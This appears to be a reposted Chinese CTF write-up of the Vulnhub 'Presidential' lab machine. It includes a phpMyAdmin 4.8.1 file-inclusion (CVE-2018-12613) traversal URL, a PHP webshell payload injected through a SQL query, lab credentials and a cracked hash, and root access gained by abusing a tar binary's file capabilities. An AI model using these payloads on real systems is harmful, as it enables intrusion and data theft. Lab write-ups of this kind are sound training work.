23、Presidential

news2024/11/18 21:36:37

难度 中

目标 root权限 2个flag

基于virtualbox启动

题目提示枚举是你的朋友

kali 192.168.86.102 靶机 192.168.86.107

信息收集

端口扫描

tcp开启的端口就两个,稳妥起见扫了一些常见的端口看是否有UDP协议开放的端口。同时nmap在扫描80端口提示可能存在的trace的请求方法

web测试

主页看了一下没有发现什么功能点

扫描目录

使用dirsearch直接跑

python3 dirsearch.py -u http://192.168.86.107/ -e txt,php,html,zip,bak

跑出一个config.php.bak有点意思

直接访问还看不到需要查看源代码

$dbUser = "votebox";

$dbPass = "casoj3FFASPsbyoRP";

$dbHost = "localhost";

$dbname = "votebox";

这些估计是数据库的账号密码但是数据库的端口并没有开放出来

那么使用这些作为字典去测试一下ssh看能不能登录,然而并没有成功

然后没什么思路了看了下wp好家伙又要添加域名。。。。。。

虽然之前也遇到过这样的情况但是还是没有第一时间想到

把这个域名添加到hosts文件中

然后又爆破一波目录没有新的结果,那么挖掘一波子域名

gobuster vhost -u http://votenow.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --append-domain --timeout 60s --random-agent -q |grep "Status: 200"

跑子域名这种也是需要用各种字典去测。。。

将新得到的子域名也写入到hosts文件中

访问子域名是一个phpmyadmin

 突破边界

用刚才得到的账号密码登录

$dbUser = "votebox";

$dbPass = "casoj3FFASPsbyoRP";

进来翻一下数据库文件发现有个admin和密码

$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i

那个在线解密网站要钱。。。只能本地使用john看能不能解出来

爆了很久可能是虚拟机的cpu没给多终于爆出来了 Stella

拿着这个进行ssh登录但是失败了,说没有这个名字。

另外继续在页面找一下信息,看到是phpmyadmin先看看版本4.8.1

然后在网上搜索或者在msfz中搜索一下有没有可以利用的漏洞

先尝试rce的漏洞

执行后没有反应

然后试一试第一个文件包含

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../etc/passwd

可以看到成功包含了文件,同时得知有个admin用户。那么可以尝试包含日志文件getshell

但是尝试了一下没有找到常见的日志不太好包含,网站的路径也不知道

再看看第二个文件包含怎么利用的

没看懂这个payload的使用方式,直接访问也没有反应,在网上搜索了一下CVE-2018-12613

首先先输入一个SQL语句

SELECT '<?php phpinfo()?>';

然后找打phpmyadmin的cookie

d2vmej86knkpthep2n5kejqlt5ak018l

然后访问这个路径,这个路径还有几种路径有可能在/tmp/sess_[当前会话session]或者在/var/lib/php/sessions/sess_[当前会话session]

这里在 /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d2vmej86knkpthep2n5kejqlt5ak018l

可以看到成功的包含了文件,那么可以尝试写入shell了

输入

SELECT '<?php system($_GET["cmd"]);?>';

再次包含的时候添加参数&cmd=反弹shell的命令

直接使用/bin/bash反弹shell成功

使用python -c 'import pty;pty.spawn("/bin/bash")' 提升一下shell

进入后尝试sudo -l要密码

然后使用前面获取的admin和密码看能不能su admin

很好果然密码是对的估计是限制了不允许admin使用ssh登录

提权

进入admin目录有两个文件,拿到一个flag,但是notes.txt文件读取出来好像是提示

他说利用新命令备份和压缩敏感文件

估计是有个压缩的命令可以用来提权。

不过我看了一下内核版本符合脏牛漏洞的范围疑似可以使用dirtycow提权

不过先上了信息收集工具linpeas.sh 找了一下那个命令

应该是这个tars命令

或者使用

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" -exec ls -l {} \; 2>/dev/null

也可以找到

但是tarS并不是SUID,没看出来有什么可以利用的地方。。。

看了下wp和Capabilities漏洞有关,我也是第一次了解到这个漏洞

Linux Capabilities 简介 - sparkdev - 博客园

就是因为SUID给的权限太大了于是使用这个用来细分权限

使用

getcap -r / 2>/dev/null

用来查看哪些程序进行了 Capabilities的设置

查一下tarS 的权限

+ep应该是更高的权限

也就是说tarS在压缩文件的时候是无视使用者的权限,相当于sudo去执行一样只不过值针对于压缩行为

那么我们可以使用这个命令去压缩一些我们无法访问的目录然后解压再读取

tarS的使用方式和tar差不多,可以使用--help查看使用方式

解压

tarS -xvf root.tar

拿到第二个flag

同时在.ssh中发现啊有个公钥和私钥

并且authorized_keys中写好了公钥那么可以尝试那这个私钥进行登录

成功拿到root权限。

 后记

        整体还是挺有意思的,了解了phpmyadmin的一些历史漏洞以及Capabilities权限的一些咯漏洞利用。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2172697.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

OCR识别系统 YOLOv8 +Paddle 方案落地

YOLOv8 PaddleOCR 技术方案落地 Yolov8相关文档Step 1 证件模型的训练Step 2 Yolov8进行图片推理Step 3 PaddleOCR进行识别Step 4 整合Yolov8 PaddleOCR 进行OCR Yolov8相关文档 《yolov8 官方网站》 《Yolov8 保姆级别安装》 Ultralytics YOLOv8 是一款尖端的、最先进的 (S…

NASA数据集:ATLAS/ICESat-2 L3B 南极和北极网格陆地冰高,第 3 版

目录 简介 摘要 代码 引用 网址推荐 0代码在线构建地图应用 机器学习 ATLAS/ICESat-2 L3B Gridded Antarctic and Arctic Land Ice Height V003 简介 ATLAS/ICESat-2 L3B 南极和北极网格陆地冰高&#xff0c;第 3 版 ATL14 和 ATL15 将 ATLAS/ICESat-2 L3B 年度陆地冰…

5 分钟快速入门 Github Action

Github Action 是一种自动化构建工具。 ‍ 介绍 什么是 GitHub Action&#xff1f;来看看阮一峰大佬的介绍&#xff1a; GitHub Actions 是 GitHub 的持续集成服务&#xff0c;于 2018 年 10 月推出。 大家知道&#xff0c;持续集成由很多操作组成&#xff0c;比如抓取代码、…

深度学习(入门)03:监督学习

1、监督学习简介 监督学习&#xff08;Supervised Learning&#xff09;是一种重要的机器学习方法&#xff0c;它的目标是通过“已知输入特征”来预测对应的标签。在监督学习中&#xff0c;每一个“特征-标签”对被称为样本&#xff08;example&#xff09;&#xff0c;这些样…

视觉分析在垃圾检测中的应用

随着城市化进程的加快&#xff0c;垃圾管理成为现代城市面临的重大挑战。有效的垃圾识别和分类不仅能提升环境保护的效率&#xff0c;还能减少资源浪费。基于视觉分析的垃圾识别算法应运而生&#xff0c;为解决这一问题提供了技术支持。 垃圾识别算法的技术实现主要依赖于深度学…

FreeRTOS-队列

FreeRTOS-消息队列 一、队列简介二、队列相关函数2.1 队列结构体2.2 队列相关API函数 三、队列操作实验 一、队列简介 队列是任务到任务、任务到中断、中断到任务数据交流的一种机制(消息传递)使用队列的情况下如图&#xff0c;在写、读队列时&#xff0c;会进入临界区&#x…

前端使用vue点击上传文件,传送给后端,后端进行文件接收

一、效果图 前端页面&#xff1a; 在java这边后端的target文件就可以接收到前端发送的文件&#xff0c;文件可以打开 接下来看具体代码是怎么实现的&#xff01; 二、代码部分 Vue代码 <template> <el-upload ref"upload" class"upload-demo&q…

黑马头条day5- 延迟任务精准发布文章

这个过程主要是流程负责 但是我没有仔细的过所有的流程 需要多刷几遍 今天只是照着md文档执行了一下 运行起来没差错 主要实现文章定时发布 通过schedule模块作为延迟队列的任务 通过redis实现的延迟任务 具体 实现还要在多走几遍流程 逻辑一点不清楚 没看网课 这节要多看几遍…

【最大公约数】

题目 思路 g c d ( x , y ) p x , y ∈ [ 1 , N ] gcd(x, y) p\;\;x,y\in[1,N] gcd(x,y)px,y∈[1,N] 转换为 g c d ( x p , y p ) 1 x p , y p ∈ [ 1 , N p ] gcd(\frac{x}{p}, \frac{y}{p}) 1\;\;\frac{x}{p},\frac{y}{p}\in[1,\frac{N}{p}] gcd(px​,py​)1px​,py​∈…

云栖实录 | 开源大数据全面升级:Native 核心引擎、Serverless 化、湖仓架构引领云上大数据发展

本文根据2024云栖大会实录整理而成&#xff0c;演讲信息如下&#xff1a; 演讲人&#xff1a; 王 峰 | 阿里云智能集团研究员、开源大数据平台负责人 李 钰&#xff5c;阿里云智能集团资深技术专家 范 振&#xff5c;阿里云智能集团高级技术专家 李劲松&#xff5c;阿里云…

Vulnhub靶机:DerpNStink: 1

0x01 项目地址 DerpNStink: 1 0x02 靶机描述 Your goal is to remotely attack the VM and find all 4 flags eventually leading you to full root access. Dont forget to #tryharder 您的目标是远程攻击虚拟机并找到所有 4 个 flag &#xff0c;最终让您获得完全 root 访…

Updates were rejected because the tip of your current branch is behind 的解决方法

1. 问题描述 当我们使用 git push 推送代码出现以下问题时&#xff1a; 2. 原因分析 这个错误提示表明当前本地分支落后于远程分支&#xff0c;因此需要先拉取远程的更改。 3. 解决方法 1、拉取远程更改 在终端中执行以下命令&#xff0c;拉取远程分支的更新并合并到本地…

SpringBoot学习笔记(1)

1.Web技术基础 BS:(Browser/Server,浏览器/服务器架构模式)。C/S架构主要特点是交互性强&#xff0c;具有安全访问模式&#xff0c;网络流量低&#xff0c;响应速度快&#xff0c;因为客户端负责大多数业务逻辑和UI演示&#xff0c;所以也被称为胖客户端&#xff0c;C/S结构的软…

【含文档】基于Springboot+微信小程序 的中心医院用户移动端(含源码+数据库+lw)

1.开发环境 开发系统:Windows10/11 架构模式:MVC/前后端分离 JDK版本: Java JDK1.8 开发工具:IDEA 数据库版本: mysql5.7或8.0 数据库可视化工具: navicat 服务器: SpringBoot自带 apache tomcat 主要技术: Java,Springboot,mybatis,mysql,vue 2.视频演示地址 3.功能 系统定…

学习之什么是生成器

什么是生成器&#xff08;Generator&#xff09; 1、是一种数据类型能源源不断地生成数据 2、"惰性"特点:一次生成一个值&#xff0c;而不是生成一个序列 3、生成器一定是迭代器比迭代器更简洁使用生成器表达式创建生成器 from typing import Generator, Iterator,…

【hot100-java】【柱状图中最大的矩形】

R9-栈篇 面积最大矩形的高度一定是 heights 中的元素 简单解释&#xff0c;就是说&#xff0c;最大高度必然是heights中的一个元素&#xff0c;我们假设是h&#xff0c;然后我们基于h&#xff0c;左右拓展&#xff0c;尽量拓展到h越来越高&#xff08;符合单调栈&#xff09;&a…

7.6透视变换

基本概念 在计算机视觉和图像处理领域中&#xff0c;透视变换&#xff08;Perspective Transformation&#xff09;是一种重要的几何变换&#xff0c;用于模拟从一个视角到另一个视角的变换&#xff0c;比如从鸟瞰视角到正面视角的变换。透视变换通常用于图像配准、增强现实、…

ubuntu报错you don‘t have enough free space in /var/cache/apt/archivers.

使用df -h命令查看&#xff1b; 扩充前&#xff0c;dev/sda2的大小&#xff1a; 使用gparted工具对dev/sda2进行扩容

Steam黑神话悟空禁止更新进入游戏的解决方案

首先打开该网站&#xff1a;https://steamdb.info/app/2358720/ 2358720即为游戏ID 网页下翻&#xff0c;找到更新历史&#xff1a;https://steamdb.info/app/2358720/history/ 然后在Steam的steamapps下&#xff0c;找到后缀为2358720的文件&#xff0c;右击记事本打开 将St…

老照片修复工具有哪些?怎么让老照片焕发新光彩?

在那些泛黄的相框中&#xff0c;珍藏着我们最珍贵的记忆。 岁月流转&#xff0c;照片上的影像逐渐模糊&#xff0c;但那份情感却愈发深刻。 如何让这些老照片恢复往日的光彩&#xff0c;让那些珍贵的瞬间再次清晰呈现&#xff1f; 本文将带你探索老照片修复高清的技巧&#…